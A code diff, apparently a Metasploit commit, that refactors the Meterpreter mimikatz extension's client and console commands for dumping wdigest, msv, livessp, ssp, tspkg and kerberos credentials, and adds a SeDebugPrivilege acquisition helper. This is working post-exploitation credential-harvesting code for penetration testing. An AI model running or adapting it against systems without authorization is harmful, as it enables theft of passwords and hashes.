Refactoring

Author: Meatballs1

lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb

@@ -32,29 +32,9 @@ def initialize(client)
 				},
 			])
 	end
-
-	def wdigest
-		request = Packet.create_request('mimikatz_wdigest')
-		response = client.send_request(request)
-		result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
 
-		details = CSV.parse(result)
-		accounts  =  []
-		details.each do |acc|
-			account = { 
-				:authid => acc[0],
-				:package => acc[1],
-				:user => acc[2],
-				:domain => acc[3],
-				:password => acc[4]
-			}
-			accounts << account	
-		end
-		return accounts
-	end
-	
-	def msv
-                request = Packet.create_request('mimikatz_msv1_0')
+	def mimikatz_send_request(method)
+                request = Packet.create_request(method)
                 response = client.send_request(request)
                 result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
 
@@ -73,85 +53,30 @@ def msv
                 return accounts
 	end
 
-        def livessp
-                request = Packet.create_request('mimikatz_livessp')
-                response = client.send_request(request)
-                result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
+	def wdigest
+		mimikatz_send_request('mimikatz_wdigest')
+	end
+	
+	def msv
+		mimikatz_send_request('mimikatz_msv1_0')
+	end
 
-                details = CSV.parse(result)
-                accounts  =  []
-                details.each do |acc|
-                        account = {
-                                :authid => acc[0],
-                                :package => acc[1],
-                                :user => acc[2],
-                                :domain => acc[3],
-                                :password => acc[4]
-                        }
-                        accounts << account
-                end
-                return accounts
+        def livessp
+		mimikatz_send_request('mimikatz_livessp')
         end
 
         def ssp
-                request = Packet.create_request('mimikatz_ssp')
-                response = client.send_request(request)
-                result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
-
-                details = CSV.parse(result)
-                accounts  =  []
-                details.each do |acc|
-                        account = {
-                                :authid => acc[0],
-                                :package => acc[1],
-                                :user => acc[2],
-                                :domain => acc[3],
-                                :password => acc[4]
-                        }
-                        accounts << account
-                end
-                return accounts
+                mimikatz_send_request('mimikatz_ssp')
         end
 
         def tspkg
-                request = Packet.create_request('mimikatz_tspkg')
-                response = client.send_request(request)
-                result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
-
-                details = CSV.parse(result)
-                accounts  =  []
-                details.each do |acc|
-                        account = {
-                                :authid => acc[0],
-                                :package => acc[1],
-                                :user => acc[2],
-                                :domain => acc[3],
-                                :password => acc[4]
-                        }
-                        accounts << account
-                end
-                return accounts
+                mimikatz_send_request('mimikatz_tspkg')
         end
 
         def kerberos
-                request = Packet.create_request('mimikatz_kerberos')
-                response = client.send_request(request)
-                result = Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
-
-                details = CSV.parse(result)
-                accounts  =  []
-                details.each do |acc|
-                        account = {
-                                :authid => acc[0],
-                                :package => acc[1],
-                                :user => acc[2],
-                                :domain => acc[3],
-                                :password => acc[4]
-                        }
-                        accounts << account
-                end
-                return accounts
+                mimikatz_send_request('mimikatz_kerberos')
         end
 end
 
 end; end; end; end; end
+

lib/rex/post/meterpreter/ui/console/command_dispatcher/mimikatz.rb

@@ -29,22 +29,19 @@ def initialize(shell)
 	#
 	def commands
 		{
-			"wdigest" => "Attempt to retrieve cleartext wdigest passwords",
-			"msv" => "Attempt to retrieve hashes",
+			"wdigest" => "Attempt to retrieve wdigest creds",
+			"msv" => "Attempt to retrieve msv creds (hashes)",
 			"livessp" => "Attempt to retrieve livessp creds",
 			"ssp" => "Attempt to retrieve ssp creds",
 			"tspkg" => "Attempt to retrieve tspkg creds",
 			"kerberos" => "Attempt to retrieve kerberos creds"
 		}
 	end
 
-	def cmd_wdigest(*args)
-		unless system_check
-                        print_status("Attempting to get getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.wdigest
+	def mimikatz_request(provider, method)
+		get_privs
+                print_status("Retrieving #{provider} credentials")
+                accounts = method.call
 
                 table = Rex::Ui::Text::Table.new(
                         'Indent' => 0,
@@ -63,139 +60,53 @@ def cmd_wdigest(*args)
 
                 return true
 	end
+	
+	def cmd_wdigest(*args)
+		method = Proc.new { client.mimikatz.wdigest }
+		mimikatz_request("wdigest", method)
+	end
 
 	def cmd_msv(*args)
-                unless system_check
-                        print_status("Attempting to get getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.msv
-                
-                table = Rex::Ui::Text::Table.new(
-                        'Indent' => 0,
-                        'SortIndex' => 4,
-                        'Columns' =>
-                        [
-                                'AuthID', 'Package', 'Domain', 'User', 'Hash'
-                        ]
-                )
-                        
-                accounts.each do |acc|
-                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]       
-                end
-
-                table.print     
-
-                return true
+		method = Proc.new { client.mimikatz.msv }
+		mimikatz_request("msv", method)
 	end
 
         def cmd_livessp(*args)
-                unless system_check
-                        print_status("Attempting to getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.livessp
-
-                table = Rex::Ui::Text::Table.new(
-                        'Indent' => 0,
-                        'SortIndex' => 4,
-                        'Columns' =>
-                        [
-                                'AuthID', 'Package', 'Domain', 'User', 'Password'
-                        ]
-                )
-
-                accounts.each do |acc|
-                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]
-                end
-
-                table.print
-
-                return true
+                method = Proc.new { client.mimikatz.livessp }
+                mimikatz_request("livessp", method)
         end
 
         def cmd_ssp(*args)
-                unless system_check
-                        print_status("Attempting to getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.ssp
-
-                table = Rex::Ui::Text::Table.new(
-                        'Indent' => 0,
-                        'SortIndex' => 4,
-                        'Columns' =>
-                        [
-                                'AuthID', 'Package', 'Domain', 'User', 'Password'
-                        ]
-                )
-
-                accounts.each do |acc|
-                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]
-                end
-
-                table.print
-
-                return true
-        end
+                method = Proc.new { client.mimikatz.ssp }
+                mimikatz_request("ssp", method)
+	end
 
         def cmd_tspkg(*args)
-                unless system_check
-                        print_status("Attempting to getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.tspkg
-
-                table = Rex::Ui::Text::Table.new(
-                        'Indent' => 0,
-                        'SortIndex' => 4,
-                        'Columns' =>
-                        [
-                                'AuthID', 'Package', 'Domain', 'User', 'Password'
-                        ]
-                )
-
-                accounts.each do |acc|
-                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]
-                end
-
-                table.print
-
-                return true
+                method = Proc.new { client.mimikatz.tspkg }
+                mimikatz_request("tspkg", method)
         end
 
         def cmd_kerberos(*args)
+                method = Proc.new { client.mimikatz.kerberos }
+                mimikatz_request("kerberos", method)
+        end
+	
+	def get_privs
                 unless system_check
                         print_status("Attempting to getprivs")
-                        client.sys.config.getprivs
-                end
-                print_status("Retrieving passwords")
-                accounts = client.mimikatz.kerberos
-
-                table = Rex::Ui::Text::Table.new(
-                        'Indent' => 0,
-                        'SortIndex' => 4,
-                        'Columns' =>
-                        [
-                                'AuthID', 'Package', 'Domain', 'User', 'Password'
-                        ]
-                )
-
-                accounts.each do |acc|
-                        table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]
-                end
-
-                table.print
-
-                return true
-        end
+                        privs = client.sys.config.getprivs
+                        unless privs.include? "SeDebugPrivilege"
+                                print_warning("Did not get SeDebugPrivilege")
+			else
+				print_good("Got SeDebugPrivilege")
+                        end
+                else
+			print_good("Running as SYSTEM")
+		end
+	end
 
 	def system_check
-		if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+		unless (client.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
 			print_warning("Not currently running as SYSTEM")
 			return false
 		end
@@ -216,3 +127,4 @@ def name
 end
 end
 end
+